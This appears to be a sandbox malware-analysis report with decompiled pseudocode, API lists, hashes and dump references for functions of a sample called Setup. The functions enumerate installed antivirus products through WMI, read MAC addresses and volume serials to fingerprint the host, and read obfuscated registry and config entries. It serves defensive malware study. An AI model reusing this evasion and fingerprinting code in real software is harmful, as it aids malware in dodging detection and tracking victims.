                                                                                                                                                              0x004959f5
                                                                                                                                                              0x004959f7
                                                                                                                                                              0x00495a01
                                                                                                                                                              0x00495a01
                                                                                                                                                              0x00495a0d
                                                                                                                                                              0x00495a15
                                                                                                                                                              0x00495a1a
                                                                                                                                                              0x00495a21
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004959a3
                                                                                                                                                              0x0049599d
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0049598e
                                                                                                                                                              0x00495a2b
                                                                                                                                                              0x00495a32
                                                                                                                                                              0x00495a37
                                                                                                                                                              0x00495a3e
                                                                                                                                                              0x00495a43
                                                                                                                                                              0x00495a4a
                                                                                                                                                              0x00495a4f
                                                                                                                                                              0x00495a56
                                                                                                                                                              0x00495a5b
                                                                                                                                                              0x00495a62
                                                                                                                                                              0x00495a67
                                                                                                                                                              0x00495a67
                                                                                                                                                              0x00495a69
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004958fd
                                                                                                                                                              0x00495822
                                                                                                                                                              0x00495822
                                                                                                                                                              0x00495829
                                                                                                                                                              0x0049582e
                                                                                                                                                              0x00495835
                                                                                                                                                              0x0049583a
                                                                                                                                                              0x00495841
                                                                                                                                                              0x00495841
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004957d1
                                                                                                                                                              0x00495a6f
                                                                                                                                                              0x00495a76
                                                                                                                                                              0x00495a81
                                                                                                                                                              0x00495a84
                                                                                                                                                              0x00495a8b
                                                                                                                                                              0x00495a96
                                                                                                                                                              0x00495aab
                                                                                                                                                              0x00495aab
                                                                                                                                                              0x0049573b
                                                                                                                                                              0x00495742
                                                                                                                                                              0x00000000

                                                                                                                                                              APIs
                                                                                                                                                              • CoCreateInstance.OLE32(0051D91C,00000000,00000001,0051D84C,00000000,00000000,DDD124F9), ref: 0049571D
                                                                                                                                                              • CoSetProxyBlanket.OLE32(00000000,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00495813
                                                                                                                                                                • Part of subcall function 00417300: SysFreeString.OLEAUT32(?), ref: 0041730D
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: BlanketCreateFreeInstanceProxyString
                                                                                                                                                              • String ID: SELECT * FROM AntivirusProduct$WQL$displayName
                                                                                                                                                              • API String ID: 2425965127-1899659945
                                                                                                                                                              • Opcode ID: 93a75100d385984e2f38990b6fa03ec58190dc7e991788bc291b8f7b7eacd86c
                                                                                                                                                              • Instruction ID: a90a17872c16f0e7047f23e41f78ce943a9bde9899b374faa89ec17282e8318f
                                                                                                                                                              • Opcode Fuzzy Hash: 93a75100d385984e2f38990b6fa03ec58190dc7e991788bc291b8f7b7eacd86c
                                                                                                                                                              • Instruction Fuzzy Hash: 71C17F70D05248EEDF15EBA5D851BEDBBB0BF14308F60806EE412B71D2DB782A49CB59
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00483370 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 139COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 73%
                                                                                                                                                              			E00483370(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
				intOrPtr _v8;
				char _v16;
				signed int _v20;
				char _v24;
				signed int _v28;
				intOrPtr _v34;
				intOrPtr _v38;
				intOrPtr _v42;
				intOrPtr _v46;
				intOrPtr _v50;
				intOrPtr _v54;
				char _v56;
				signed int _v57;
				signed int _v64;
				signed int _v68;
				char _v69;
				char _v70;
				signed int _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				void* __ebp;
				signed int _t70;
				signed int _t71;
				signed int _t75;
				signed int _t76;
				void* _t78;
				signed int _t81;
				intOrPtr _t82;
				signed int _t91;
				signed int _t119;
				void* _t123;
				void* _t126;
				signed int _t127;
				void* _t128;
				void* _t130;

				_t126 = __esi;
				_t125 = __edi;
				_t95 = __ebx;
				_push(0xffffffff);
				_push(0x50819f);
				_push( *[fs:0x0]);
				_t70 =  *0x561244; // 0xddd124f9
				_t71 = _t70 ^ _t127;
				_v28 = _t71;
				_push(_t71);
				 *[fs:0x0] =  &_v16;
				_v80 = __ecx;
				_v76 = 0;
				_v24 = 0;
				_v56 = 0;
				_v54 = 0;
				_v50 = 0;
				_v46 = 0;
				_v42 = 0;
				_v38 = 0;
				_v34 = 0;
				_t116 =  &_v24;
				_push( &_v24);
				_push(0);
				_push(0);
				_push(0);
				_push(0); // executed
				L0044F178(); // executed
				_t75 = E0044FBD9(__ebx,  &_v24, __edi, _v24);
				_t130 = _t128 - 0x44 + 4;
				_v20 = _t75;
				if(_v20 != 0) {
					_push( &_v24);
					_t76 = _v20;
					_push(_t76);
					_push(0);
					_push(0);
					_push(0); // executed
					L0044F178(); // executed
					__eflags = _t76;
					if(__eflags == 0) {
						_v57 = 1;
						_v64 = _v20;
						while(1) {
							__eflags = _v57 & 0x000000ff;
							if((_v57 & 0x000000ff) == 0) {
								break;
							}
							__eflags = _v64;
							if(_v64 != 0) {
								_t119 = _v64;
								__eflags =  *((intOrPtr*)(_t119 + 0x34)) - 6;
								if( *((intOrPtr*)(_t119 + 0x34)) >= 6) {
									_v84 = 6;
								} else {
									_v84 =  *((intOrPtr*)(_v64 + 0x34));
								}
								_v24 = _v84;
								_v68 = 0;
								while(1) {
									__eflags = _v68 - _v24;
									if(_v68 >= _v24) {
										break;
									}
									_t123 = _v64 + _v68;
									__eflags =  *(_t123 + 0x2c) & 0x000000ff;
									if(( *(_t123 + 0x2c) & 0x000000ff) != 0) {
										_v57 = 0;
									}
									wsprintfW(_t127 + (_v68 << 1) * 2 - 0x34, L"%02X",  *(_v64 + _v68 + 0x2c) & 0x000000ff);
									_t130 = _t130 + 0xc;
									_t91 = _v68 + 1;
									__eflags = _t91;
									_v68 = _t91;
								}
								_v64 =  *((intOrPtr*)(_v64 + 8));
								continue;
							}
							break;
						}
						__eflags = _v57 & 0x000000ff;
						if(__eflags != 0) {
							__eflags = 0;
							_v56 = 0;
						}
					}
					_push(_v20);
					E0044FAFC(_t95, _t125, _t126, __eflags);
					_t78 = E00434050( &_v70);
					_t116 =  &_v56;
					E00417910( &_v56, _t78);
					_v8 = 0;
					_t81 = _v76 | 0x00000001;
					__eflags = _t81;
					_v76 = _t81;
					_t82 = _a4;
				} else {
					E004175C0(E00434050( &_v69));
					_v8 = 0;
					_v76 = _v76 | 0x00000001;
					_t82 = _a4;
				}
				 *[fs:0x0] = _v16;
				return E0044F6C8(_t82, _t95, _v28 ^ _t127, _t116, _t125, _t126);
			}






































                                                                                                                                                              0x00483370
                                                                                                                                                              0x00483370
                                                                                                                                                              0x00483370
                                                                                                                                                              0x00483373
                                                                                                                                                              0x00483375
                                                                                                                                                              0x00483380
                                                                                                                                                              0x00483384
                                                                                                                                                              0x00483389
                                                                                                                                                              0x0048338b
                                                                                                                                                              0x0048338e
                                                                                                                                                              0x00483392
                                                                                                                                                              0x00483398
                                                                                                                                                              0x0048339b
                                                                                                                                                              0x004833a2
                                                                                                                                                              0x004833ab
                                                                                                                                                              0x004833b1
                                                                                                                                                              0x004833b4
                                                                                                                                                              0x004833b7
                                                                                                                                                              0x004833ba
                                                                                                                                                              0x004833bd
                                                                                                                                                              0x004833c0
                                                                                                                                                              0x004833c3
                                                                                                                                                              0x004833c6
                                                                                                                                                              0x004833c7
                                                                                                                                                              0x004833c9
                                                                                                                                                              0x004833cb
                                                                                                                                                              0x004833cd
                                                                                                                                                              0x004833cf
                                                                                                                                                              0x004833d8
                                                                                                                                                              0x004833dd
                                                                                                                                                              0x004833e0
                                                                                                                                                              0x004833e7
                                                                                                                                                              0x00483415
                                                                                                                                                              0x00483416
                                                                                                                                                              0x00483419
                                                                                                                                                              0x0048341a
                                                                                                                                                              0x0048341c
                                                                                                                                                              0x0048341e
                                                                                                                                                              0x00483420
                                                                                                                                                              0x00483425
                                                                                                                                                              0x00483427
                                                                                                                                                              0x0048342d
                                                                                                                                                              0x00483434
                                                                                                                                                              0x00483442
                                                                                                                                                              0x00483446
                                                                                                                                                              0x00483448
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0048344a
                                                                                                                                                              0x0048344e
                                                                                                                                                              0x00483450
                                                                                                                                                              0x00483453
                                                                                                                                                              0x00483457
                                                                                                                                                              0x00483464
                                                                                                                                                              0x00483459
                                                                                                                                                              0x0048345f
                                                                                                                                                              0x0048345f
                                                                                                                                                              0x0048346e
                                                                                                                                                              0x00483471
                                                                                                                                                              0x00483483
                                                                                                                                                              0x00483486
                                                                                                                                                              0x00483489
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0048348e
                                                                                                                                                              0x00483495
                                                                                                                                                              0x00483497
                                                                                                                                                              0x00483499
                                                                                                                                                              0x00483499
                                                                                                                                                              0x004834b7
                                                                                                                                                              0x004834bd
                                                                                                                                                              0x0048347d
                                                                                                                                                              0x0048347d
                                                                                                                                                              0x00483480
                                                                                                                                                              0x00483480
                                                                                                                                                              0x0048343f
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0048343f
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0048344e
                                                                                                                                                              0x004834cb
                                                                                                                                                              0x004834cd
                                                                                                                                                              0x004834cf
                                                                                                                                                              0x004834d1
                                                                                                                                                              0x004834d1
                                                                                                                                                              0x004834cd
                                                                                                                                                              0x004834d8
                                                                                                                                                              0x004834d9
                                                                                                                                                              0x004834e4
                                                                                                                                                              0x004834ea
                                                                                                                                                              0x004834f1
                                                                                                                                                              0x004834f6
                                                                                                                                                              0x00483500
                                                                                                                                                              0x00483500
                                                                                                                                                              0x00483503
                                                                                                                                                              0x00483506
                                                                                                                                                              0x004833e9
                                                                                                                                                              0x004833f5
                                                                                                                                                              0x004833fa
                                                                                                                                                              0x00483407
                                                                                                                                                              0x0048340a
                                                                                                                                                              0x0048340a
                                                                                                                                                              0x0048350c
                                                                                                                                                              0x00483521

                                                                                                                                                              APIs
                                                                                                                                                              • GetAdaptersAddresses.IPHLPAPI(00000000,00000000,00000000,00000000,00000000), ref: 004833CF
                                                                                                                                                              • _malloc.LIBCMT ref: 004833D8
                                                                                                                                                                • Part of subcall function 0044FBD9: __FF_MSGBANNER.LIBCMT ref: 0044FBFC
                                                                                                                                                                • Part of subcall function 0044FBD9: __NMSG_WRITE.LIBCMT ref: 0044FC03
                                                                                                                                                                • Part of subcall function 0044FBD9: RtlAllocateHeap.NTDLL(00000000,?,00000001,00000000,00000000,?,00457755,?,00000001,?,?,00457D86,00000018,005444D8,0000000C,00457E17), ref: 0044FC50
                                                                                                                                                              • GetAdaptersAddresses.IPHLPAPI(00000000,00000000,00000000,00000000,00000000), ref: 00483420
                                                                                                                                                              • wsprintfW.USER32 ref: 004834B7
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: AdaptersAddresses$AllocateHeap_mallocwsprintf
                                                                                                                                                              • String ID: %02X
                                                                                                                                                              • API String ID: 1271595815-436463671
                                                                                                                                                              • Opcode ID: d98c3d86e2023d1da9d40ef67c3cdeb00527ce2c862d077feb75bdbbf60aef80
                                                                                                                                                              • Instruction ID: 74c00cfa6e4194ed32f9d88a42d5c1b14a641d40552b31fe4e7540d7c5541a95
                                                                                                                                                              • Opcode Fuzzy Hash: d98c3d86e2023d1da9d40ef67c3cdeb00527ce2c862d077feb75bdbbf60aef80
                                                                                                                                                              • Instruction Fuzzy Hash: 78514B70E04248DFDB08DF99D881BEEBBB1BF48B05F10452EE405A7380D774AA05CB59
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00482B50 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 118COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 87%
                                                                                                                                                              			E00482B50(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
				char _v8;
				char _v16;
				signed int _v20;
				char _v48;
				void* _v52;
				char _v60;
				char _v128;
				char _v132;
				char _v164;
				char _v192;
				char _v193;
				char _v194;
				signed int _v200;
				intOrPtr _v204;
				intOrPtr _v208;
				intOrPtr _v212;
				char _v216;
				intOrPtr _v220;
				intOrPtr _v224;
				signed int _t57;
				signed int _t58;
				intOrPtr _t62;
				void* _t69;
				signed int _t73;
				intOrPtr _t76;
				signed int _t115;

				_t114 = __esi;
				_t113 = __edi;
				_t86 = __ebx;
				_push(0xffffffff);
				_push(0x50a6fb);
				_push( *[fs:0x0]);
				_t57 =  *0x561244; // 0xddd124f9
				_t58 = _t57 ^ _t115;
				_v20 = _t58;
				_push(_t58);
				 *[fs:0x0] =  &_v16;
				_v200 = 0;
				E00434E30( &_v60);
				_v8 = 1;
				_t62 = E00482980(__ebx, __edi, __esi, __eflags,  &_v164, "LIpq0hKVkVaLMSLNpdvbwZ1ujeVTM3C6kW4BzYpnFeY3Qs6E"); // executed
				_v204 = _t62;
				_v208 = _v204;
				_v8 = 2;
				_v212 = _v208;
				if(_v212 == 0) {
					_v216 = 0;
				} else {
					_v216 = _v212 + 4;
				}
				_t111 =  &_v192;
				_v220 = E00409760( &_v192, L"Software\\", _v216);
				_v224 = _v220;
				_v8 = 3;
				E00409810(_v224);
				_v8 = 5;
				E004178C0( &_v192);
				_v8 = 6;
				E004176E0();
				_t69 = E0041EEA0( &_v60, 0x80000001, E00416A30( &_v48), 1); // executed
				if(_t69 != 0) {
					L6:
					E00417910("0", E00434050( &_v194));
					_t73 = _v200 | 0x00000001;
					__eflags = _t73;
					_v200 = _t73;
					_v8 = 1;
					E004176E0();
					_v8 = 0;
					E0041EF60( &_v60);
					_t76 = _a4;
				} else {
					_v132 = 0x20;
					_t111 =  &_v132;
					if(E0041EDE0( &_v60, L"version",  &_v128,  &_v132) != 0) {
						goto L6;
					} else {
						E00417910( &_v128, E00434050( &_v193));
						_t111 = _v200 | 0x00000001;
						_v200 = _v200 | 0x00000001;
						_v8 = 1;
						E004176E0();
						_v8 = 0;
						E0041EF60( &_v60);
						_t76 = _a4;
					}
				}
				 *[fs:0x0] = _v16;
				return E0044F6C8(_t76, _t86, _v20 ^ _t115, _t111, _t113, _t114);
			}





























                                                                                                                                                              0x00482b50
                                                                                                                                                              0x00482b50
                                                                                                                                                              0x00482b50
                                                                                                                                                              0x00482b53
                                                                                                                                                              0x00482b55
                                                                                                                                                              0x00482b60
                                                                                                                                                              0x00482b67
                                                                                                                                                              0x00482b6c
                                                                                                                                                              0x00482b6e
                                                                                                                                                              0x00482b71
                                                                                                                                                              0x00482b75
                                                                                                                                                              0x00482b7b
                                                                                                                                                              0x00482b88
                                                                                                                                                              0x00482b8d
                                                                                                                                                              0x00482ba0
                                                                                                                                                              0x00482ba8
                                                                                                                                                              0x00482bb4
                                                                                                                                                              0x00482bba
                                                                                                                                                              0x00482bc4
                                                                                                                                                              0x00482bd1
                                                                                                                                                              0x00482be4
                                                                                                                                                              0x00482bd3
                                                                                                                                                              0x00482bdc
                                                                                                                                                              0x00482bdc
                                                                                                                                                              0x00482bfa
                                                                                                                                                              0x00482c09
                                                                                                                                                              0x00482c15
                                                                                                                                                              0x00482c1b
                                                                                                                                                              0x00482c29
                                                                                                                                                              0x00482c2e
                                                                                                                                                              0x00482c38
                                                                                                                                                              0x00482c3d
                                                                                                                                                              0x00482c47
                                                                                                                                                              0x00482c5f
                                                                                                                                                              0x00482c66
                                                                                                                                                              0x00482ccc
                                                                                                                                                              0x00482ce0
                                                                                                                                                              0x00482ceb
                                                                                                                                                              0x00482ceb
                                                                                                                                                              0x00482cee
                                                                                                                                                              0x00482cf4
                                                                                                                                                              0x00482cfb
                                                                                                                                                              0x00482d00
                                                                                                                                                              0x00482d07
                                                                                                                                                              0x00482d0c
                                                                                                                                                              0x00482c68
                                                                                                                                                              0x00482c68
                                                                                                                                                              0x00482c6f
                                                                                                                                                              0x00482c86
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00482c88
                                                                                                                                                              0x00482c9b
                                                                                                                                                              0x00482ca6
                                                                                                                                                              0x00482ca9
                                                                                                                                                              0x00482caf
                                                                                                                                                              0x00482cb6
                                                                                                                                                              0x00482cbb
                                                                                                                                                              0x00482cc2
                                                                                                                                                              0x00482cc7
                                                                                                                                                              0x00482cc7
                                                                                                                                                              0x00482c86
                                                                                                                                                              0x00482d12
                                                                                                                                                              0x00482d27

                                                                                                                                                              APIs
                                                                                                                                                              • std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 00482B88
                                                                                                                                                                • Part of subcall function 00482980: __wsplitpath.LIBCMT ref: 00482A17
                                                                                                                                                                • Part of subcall function 00482980: PathAddBackslashW.SHLWAPI(?), ref: 00482A26
                                                                                                                                                                • Part of subcall function 00482980: GetVolumeInformationW.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00482A43
                                                                                                                                                                • Part of subcall function 00482980: _sprintf.LIBCMT ref: 00482A59
                                                                                                                                                                • Part of subcall function 00482980: _strlen.LIBCMT ref: 00482A6F
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: BackslashInformationIterator_baseIterator_base::_PathVolume__wsplitpath_sprintf_strlenstd::_
                                                                                                                                                              • String ID: $LIpq0hKVkVaLMSLNpdvbwZ1ujeVTM3C6kW4BzYpnFeY3Qs6E$Software\$version
                                                                                                                                                              • API String ID: 296098145-3287272050
                                                                                                                                                              • Opcode ID: d0cd00eb90a2c34b72cc5da48fae94cb7dae44109f6a7a7730a79e9659b0ebc9
                                                                                                                                                              • Instruction ID: c9e1c919f2778ae1223114ef198848190ed5c3c8b707527d29b4e5ca660a6d17
                                                                                                                                                              • Opcode Fuzzy Hash: d0cd00eb90a2c34b72cc5da48fae94cb7dae44109f6a7a7730a79e9659b0ebc9
                                                                                                                                                              • Instruction Fuzzy Hash: 38513A70904258EFEB14EFA5DD51BEDBBB4BF14308F10459EE409A7281EB742A88CF65
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 004D6EA0 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 118COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 87%
                                                                                                                                                              			E004D6EA0(void* __ebx, void* __edi, void* __esi, void* __eflags, WCHAR* _a4, intOrPtr _a8, char _a12) {
				char _v8;
				char _v16;
				signed int _v20;
				char _v48;
				char _v52;
				char _v574;
				short _v576;
				char _v577;
				char _v612;
				char _v613;
				intOrPtr _v620;
				char _v652;
				char _v653;
				intOrPtr _v660;
				signed int _t46;
				signed int _t47;
				signed char _t54;
				intOrPtr _t61;
				short _t63;
				WCHAR* _t65;
				void* _t68;
				signed int _t107;

				_t106 = __esi;
				_t105 = __edi;
				_t75 = __ebx;
				_push(0xffffffff);
				_push(0x509cb9);
				_push( *[fs:0x0]);
				_t46 =  *0x561244; // 0xddd124f9
				_t47 = _t46 ^ _t107;
				_v20 = _t47;
				_push(_t47);
				 *[fs:0x0] =  &_v16;
				E004175C0(E00434050( &_v577));
				_v8 = 0;
				E00495D00(__ebx, __edi, __esi, 0x10,  &_v52, 1, 1); // executed
				E004130D0( &_v48, L"Methods.txt");
				if(_a12 == 0) {
					_a12 = 0x534fe4;
				}
				_t54 = E0049E7E0( &_v52, 0); // executed
				if((_t54 & 0x000000ff) == 0) {
					L5:
					E00417910(_a12, E00434050( &_v653));
					_v8 = 2;
					_t103 =  &_v652;
					E004181D0(_a8,  &_v652);
					_v8 = 0;
					E004176E0();
					_v660 = E0042E0C0(_a8 + 4);
					_v8 = 0xffffffff;
					E004176E0();
					_t61 = _v660;
				} else {
					_t63 =  *0x534fe8; // 0x0
					_v576 = _t63;
					E00451D90(_t105,  &_v574, 0, 0x206);
					_t65 = E00416A30( &_v48);
					_t15 =  &_a12; // 0x534fe4
					if(GetPrivateProfileStringW(L"babylon", _a4,  *_t15,  &_v576, 0x104, _t65) <= 0) {
						goto L5;
					} else {
						_t68 = E00434050( &_v613);
						_t103 =  &_v576;
						E00417910( &_v576, _t68);
						_v8 = 1;
						E004181D0(_a8,  &_v612);
						_v8 = 0;
						E004176E0();
						_v620 = E0042E0C0(_a8 + 4);
						_v8 = 0xffffffff;
						E004176E0();
						_t61 = _v620;
					}
				}
				 *[fs:0x0] = _v16;
				return E0044F6C8(_t61, _t75, _v20 ^ _t107, _t103, _t105, _t106);
			}

























                                                                                                                                                              0x004d6ea0
                                                                                                                                                              0x004d6ea0
                                                                                                                                                              0x004d6ea0
                                                                                                                                                              0x004d6ea3
                                                                                                                                                              0x004d6ea5
                                                                                                                                                              0x004d6eb0
                                                                                                                                                              0x004d6eb7
                                                                                                                                                              0x004d6ebc
                                                                                                                                                              0x004d6ebe
                                                                                                                                                              0x004d6ec1
                                                                                                                                                              0x004d6ec5
                                                                                                                                                              0x004d6eda
                                                                                                                                                              0x004d6edf
                                                                                                                                                              0x004d6ef0
                                                                                                                                                              0x004d6f00
                                                                                                                                                              0x004d6f09
                                                                                                                                                              0x004d6f0b
                                                                                                                                                              0x004d6f0b
                                                                                                                                                              0x004d6f18
                                                                                                                                                              0x004d6f25
                                                                                                                                                              0x004d6fe2
                                                                                                                                                              0x004d6ff8
                                                                                                                                                              0x004d6ffd
                                                                                                                                                              0x004d7001
                                                                                                                                                              0x004d700b
                                                                                                                                                              0x004d7010
                                                                                                                                                              0x004d701a
                                                                                                                                                              0x004d702a
                                                                                                                                                              0x004d7030
                                                                                                                                                              0x004d703a
                                                                                                                                                              0x004d703f
                                                                                                                                                              0x004d6f2b
                                                                                                                                                              0x004d6f2b
                                                                                                                                                              0x004d6f31
                                                                                                                                                              0x004d6f46
                                                                                                                                                              0x004d6f51
                                                                                                                                                              0x004d6f63
                                                                                                                                                              0x004d6f78
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004d6f7a
                                                                                                                                                              0x004d6f80
                                                                                                                                                              0x004d6f86
                                                                                                                                                              0x004d6f93
                                                                                                                                                              0x004d6f98
                                                                                                                                                              0x004d6fa6
                                                                                                                                                              0x004d6fab
                                                                                                                                                              0x004d6fb5
                                                                                                                                                              0x004d6fc5
                                                                                                                                                              0x004d6fcb
                                                                                                                                                              0x004d6fd5
                                                                                                                                                              0x004d6fda
                                                                                                                                                              0x004d6fda
                                                                                                                                                              0x004d6f78
                                                                                                                                                              0x004d7048
                                                                                                                                                              0x004d705d

                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 00495D00: _memset.LIBCMT ref: 00495D56
                                                                                                                                                                • Part of subcall function 00495D00: SHGetFolderPathW.SHELL32(00000000,004CC849,00000000,00000000,?,?,?,DDD124F9), ref: 00495D6F
                                                                                                                                                                • Part of subcall function 00495D00: PathAddBackslashW.SHLWAPI(?,?,?,DDD124F9), ref: 00495D93
                                                                                                                                                              • _memset.LIBCMT ref: 004D6F46
                                                                                                                                                              • GetPrivateProfileStringW.KERNEL32 ref: 004D6F70
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Path_memset$BackslashFolderPrivateProfileString
                                                                                                                                                              • String ID: Methods.txt$babylon$OS
                                                                                                                                                              • API String ID: 3325740732-1399207056
                                                                                                                                                              • Opcode ID: 52b30a422257a18270aaca82f2a37bb098eeeedba23f74cb0a839e0075fee11b
                                                                                                                                                              • Instruction ID: 98828ad401be4145f9bc075ff7626690436c1c006785f8cac0dd7b97ecea69fe
                                                                                                                                                              • Opcode Fuzzy Hash: 52b30a422257a18270aaca82f2a37bb098eeeedba23f74cb0a839e0075fee11b
                                                                                                                                                              • Instruction Fuzzy Hash: 44418A70904218ABDB14EF65DC55FEEB774BF04304F00869EF416A7291EF786A88CB94
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00483240 Relevance: 7.6, APIs: 5, Instructions: 55COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 95%
                                                                                                                                                              			E00483240(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
				long _v8;
				signed int _v12;
				short _v14;
				intOrPtr _v18;
				short _v20;
				char _v538;
				short _v540;
				intOrPtr _v544;
				signed int _t17;
				signed int _t42;

				_t40 = __edi;
				_t17 =  *0x561244; // 0xddd124f9
				_v12 = _t17 ^ _t42;
				_v544 = __ecx;
				_v8 = 0;
				_v540 = 0;
				E00451D90(__edi,  &_v538, 0, 0x206);
				_v20 = 0;
				_v18 = 0;
				_v14 = 0;
				GetSystemDirectoryW( &_v540, 0x104);
				E0045508B( &_v540,  &_v20, 0, 0, 0);
				PathAddBackslashW( &_v20);
